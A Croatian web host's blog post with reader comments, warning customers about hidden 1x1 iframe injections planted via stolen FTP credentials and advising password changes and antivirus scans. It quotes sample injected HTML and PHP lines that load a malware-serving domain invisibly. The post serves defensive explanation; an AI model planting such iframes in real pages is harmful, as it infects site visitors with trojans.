Home > Razno, Sigurnost > Iframe attacks

Iframe attacks

malware-2Zadnjih par tjedana u toku su iframe napadi koji u index.* fileove ubacuju iframe velicine 1×1 piksela.

Kao što se vidi iz codea, veličina iframea je 1×1 piksel i otvara sadrzaj sa goooogleadsence.biz ili neke druge stranice, zavisno od slučaja do slučaja. Taj iframe učitava downloader, koji onda skida trojanca koji “naseli” Vaše računalo.

Tipični primjeri su:

HTML stranice

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

PHP stranice

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Sada se većina Vas pita, kako je moguće da netko modificira moje webove? Zar nemate nikakvu zaštitu na serverima?

Sam propust nije na serveru, nego kod samog korisnika. Pregledom logova za svaki slučaj napada koji smo imali, primjetili smo da se napadač (bot) uredno ulogirao na FTP, downloadao index.* file, izmjenio ga i uploadao nazad na server. Naravno, logiranje se je svaki put vršilo sa drugačije IP adrese, te je teško (čitaj: nemoguće) predvidjeti logiranje i blokiranje pristupa toj IP adresi.

Koje je rješenje ovog problema?

U ovom trenutku, izmjena passworda za FTP i cPanel pristup, te čišćenje računala. Ukoliko je Vaš web pogođen ovim problemom, kontaktirajte našu službu za korisnike koja će izmjeniti password od FTP-a i cPanela, te očistiti Vaše web stranice.  Od korisnika se zahtijeva da skenira računalo sa nekim kvalitetnim antivirusnim alatom (Avira, AVG, Kaspersky, NOD, itd..) sa NAJSVJEŽIJIM updateovima.

Kada korisnik potvrdi da mu je računalo čisto,  mailom ili support ticketom može zatražiti novi password od FTP-a /cPanela.

Da li će ovaj problem utjecati na moj ranking na tražilicama?

Pa, ukoliko ne primjetite problem i on ostane na webu duže vremena nesaniran – da, Vaš rank na tražilicama će pasti, a oni posjetitelji koji dođu direktno na Vaš web biti će upozoreni da stranica može naštetiti računalu, što će direktno imati za posljedicu manje posjeta, loš ugled, te u krajnoj liniji manje posla, ukoliko se Vaše poslovanje bazira na web stranicama. Ako primjetite bilo kakvu anomaliju na Vašem webu, odmah kontaktirajte našu službu za korisnike koja će istražiti problem.

Ukoliko se nakon promjene passworda i čišćenja računala problem i dalje javlja, znači da Vam računalo nije još potpuno čišto, te bi čišćenje trebalo napraviti sa par alata, tako da se eliminira problem sa antivirusnim softwareom koji koristite.


Link na par web stranica koje obrađuju istu tematiku:

Hidden iframe injection attacks | Diovo

Iframe injection – nova glavobolja za webmastere | wm.com.hr

Jedan zanimljivi post na Google Online Security blogu:

All Your iFrame Are Point to Us

  1. April 22nd, 2009 at 16:26 | #1

    Ugh da neugodni su napadi, ja sam ih počeo “ručno” riješavati :)

  2. April 30th, 2009 at 17:32 | #2

    Ja nemam problema s tim. Koristim ubuntu linux i do sada nisam imao nikakvih problema. ;)

  3. Roland
    May 25th, 2009 at 08:54 | #3

    Meni je ovaj virus zarazio jednu web stranicu i forum, ali su mi odmah izašli u susret sa hostinga i riješili problem, a ja sam sam rješio problem na forumu u index.php file. Neka luda java skripta. Kad se otvori u eksploreru počnu iskakati prozori kao da nešto želi instalirati od programa iz windowsa. U firefoksu ga je označio kao malicious site. zaražena stranica. To sam isto rješio na način da sam u webmaster tools ponovo zatražio inspekciju stranice nakon što sam maknuo skripte. Tada sam pobrisao sve pasvorde sa računala. Ali ovdje sam saznao da moram maknuti i pasvorde sa log in formi.
    Sretno svima

  4. May 25th, 2009 at 09:52 | #4

    Pregledala sam svoju web stranicu, pregledala je s Avirom i nema nikakvih takvih izmjena. Sve je o.k.
    Hvala na infu.

    ćajos, sretno svima

  5. May 30th, 2009 at 19:50 | #5

    Zaštita s korisničke strane može biti korištenje Firefoxa i NoScript add-ona, u kojem treba aktivirati opciju blokiranja IFramea.

  6. June 21st, 2009 at 16:33 | #6

    Koristim Ubuntu linux i nisam iskusio još nikakvih problema sličnih ovom. Nikad si ne mogu dovoljno puta čestitati na odluci što sam prešao na Ubuntu u cjelosti :D

  7. March 13th, 2010 at 20:55 | #7

    Khm … izgleda da mi je ipak site unatoč linuxu podlegao napadu. Kada kliknem u googlu na moj link otvara mi p3p0.com, a ljudi koji koriste vindowse javljaju mi da im se pali upozorenje antivirusa o trojanu JS:FakeAV-DX[Trj]. Gledao php ali nigdje nisam pronasao problem :( …. ima li tko ideja?

  1. No trackbacks yet.